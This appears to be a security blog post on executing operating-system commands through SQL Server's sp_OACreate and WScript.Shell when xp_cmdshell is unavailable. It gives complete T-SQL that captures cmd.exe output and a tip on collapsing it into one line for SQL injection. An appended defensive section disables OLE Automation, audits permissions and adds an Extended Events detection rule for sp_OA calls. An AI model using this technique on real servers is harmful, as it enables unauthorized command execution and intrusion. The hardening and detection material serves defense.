I found that even if xp_cmdshell is unavailable, it is still possible to run CMD on the server and get its output. This relies on several other SQL Server system stored procedures: sp_OACreate, sp_OAGetProperty and sp_OAMethod. The prerequisite is that the WScript.Shell and Scripting.FileSystemObject COM objects are available on the server.
sp_OACreate
Creates an instance of an OLE object on an instance of Microsoft SQL Server.
Syntax
sp_OACreate progid | clsid,
    objecttoken OUTPUT
    [, context]
sp_OAGetProperty
Gets a property value of an OLE object.
Syntax
sp_OAGetProperty objecttoken,
    propertyname
    [, propertyvalue OUTPUT]
    [, index...]
sp_OAMethod
Calls a method of an OLE object.
Syntax
sp_OAMethod objecttoken,
    methodname
    [, returnvalue OUTPUT]
    [, [@parametername =] parameter [OUTPUT]]
    [, ...n]
Idea:
First create a WScript.Shell object on SQL Server and call its Run method so that cmd.exe writes its output to a file. Then create a Scripting.FileSystemObject, open that file to obtain a TextStream object, read the file line by line, and insert each line as a row in a temporary table.
The corresponding SQL statements are:
CREATE TABLE mytmp (info VARCHAR(400), id INT IDENTITY(1, 1) NOT NULL)
DECLARE @shell INT
DECLARE @fso INT
DECLARE @file INT
DECLARE @isEnd BIT
DECLARE @out VARCHAR(400)
EXEC sp_oacreate 'WScript.Shell', @shell OUTPUT
EXEC sp_oamethod @shell, 'Run', NULL, 'cmd.exe /c dir c:\ > c:\temp.txt', 0, 'true'
-- The last Run argument (true) makes the call wait until the program has finished.
-- It is required for long-running commands such as ping.
EXEC sp_oacreate 'Scripting.FileSystemObject', @fso OUTPUT
EXEC sp_oamethod @fso, 'OpenTextFile', @file OUT, 'c:\temp.txt'
-- OpenTextFile returns a TextStream object, so @file is an object token.
WHILE @shell > 0   -- @shell is a positive object token, so this loops until the BREAK below
BEGIN
    EXEC sp_oamethod @file, 'ReadLine', @out OUT
    INSERT INTO mytmp (info) VALUES (@out)
    EXEC sp_oagetproperty @file, 'AtEndOfStream', @isEnd OUT
    IF @isEnd = 1 BREAK
    ELSE CONTINUE
END
SELECT info FROM mytmp ORDER BY id   -- the captured command output, one row per line
DROP TABLE mytmp
Note:
If you use this method during an injection test, the statements cannot contain this many line breaks: they must be combined into a single line, with a space separating each statement.
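The technique above only works when the 'Ole Automation Procedures' server option is enabled (it is off by default) and the caller has sysadmin-level rights, so those two conditions are the natural control points. The following T-SQL, added here as an example and not part of the original post, checks and disables that option, lists who could call the sp_OA* procedures, and starts an Extended Events session that records any batch or RPC naming them; the session name and .xel file name are arbitrary choices for this example.

```sql
USE master;

-- 1. Is the OLE Automation surface enabled? value_in_use = 1 means the sp_OA*
--    procedures will execute for any principal allowed to call them.
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name = N'Ole Automation Procedures';

-- 2. Turn it off unless an application genuinely depends on it.
EXEC sp_configure N'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure N'Ole Automation Procedures', 0;
RECONFIGURE;

-- 3. Who could call sp_OACreate and friends? By default only sysadmin members;
--    explicit EXECUTE grants in master widen that, so list both.
SELECT name AS login_name, type_desc
FROM sys.server_principals
WHERE type IN ('S', 'U', 'G')        -- SQL login, Windows user, Windows group
  AND IS_SRVROLEMEMBER(N'sysadmin', name) = 1;

SELECT USER_NAME(dp.grantee_principal_id) AS grantee,
       OBJECT_NAME(dp.major_id) AS procedure_name,
       dp.permission_name, dp.state_desc
FROM sys.database_permissions AS dp
WHERE dp.class_desc = N'OBJECT_OR_COLUMN'
  AND OBJECT_NAME(dp.major_id) LIKE N'sp_OA%';

-- 4. Record every batch or RPC that names an sp_OA* procedure, together with the
--    login, host and application that sent it. Session/file names are chosen for
--    this example; the match is case-insensitive and also catches one-line batches.
CREATE EVENT SESSION ole_automation_watch ON SERVER
ADD EVENT sqlserver.sql_batch_completed (
    ACTION (sqlserver.client_app_name, sqlserver.client_hostname,
            sqlserver.server_principal_name)
    WHERE sqlserver.like_i_sql_unicode_string(batch_text, N'%sp_OA%')),
ADD EVENT sqlserver.rpc_completed (
    ACTION (sqlserver.client_app_name, sqlserver.client_hostname,
            sqlserver.server_principal_name)
    WHERE sqlserver.like_i_sql_unicode_string(statement, N'%sp_OA%'))
ADD TARGET package0.event_file (SET filename = N'ole_automation_watch.xel');
ALTER EVENT SESSION ole_automation_watch ON SERVER STATE = START;
```

Read the session's .xel file with sys.fn_xe_file_target_read_file, or forward it to the SIEM; an entry from a login that is not expected to use OLE Automation is worth treating as an incident.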